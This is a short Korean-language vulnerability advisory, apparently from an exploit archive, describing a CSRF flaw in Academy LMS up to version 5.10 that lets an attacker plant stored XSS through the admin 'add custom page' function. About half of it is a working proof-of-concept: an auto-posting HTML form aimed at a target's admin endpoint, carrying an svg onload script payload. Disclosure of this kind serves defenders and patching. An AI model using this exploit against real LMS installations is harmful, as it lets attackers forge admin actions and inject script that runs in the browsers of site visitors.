
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS는 사람들이 강좌를 만들고 광고할 수 있는 애플리케이션입니다. 새 페이지를 추가하는 기능에는 이 공격을 방지할 수 있는 토큰이 없어 CSRF에 취약합니다. 또한, 이 페이지는 저장된 XSS 페이로드를 로드하는 데 사용될 수 있습니다.
개념 증명의 첫 번째 단계는 관리자 사용자로 플랫폼에 인증하는 것입니다.
그 후, 취약점을 악용하는 코드가 포함된 페이지에 접속하기만 하면 됩니다. 웹사이트 홈페이지에 새 버튼이 추가되어 XSS 페이지로 리디렉션되는 것을 확인할 수 있습니다.
익스플로잇에 사용된 코드:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>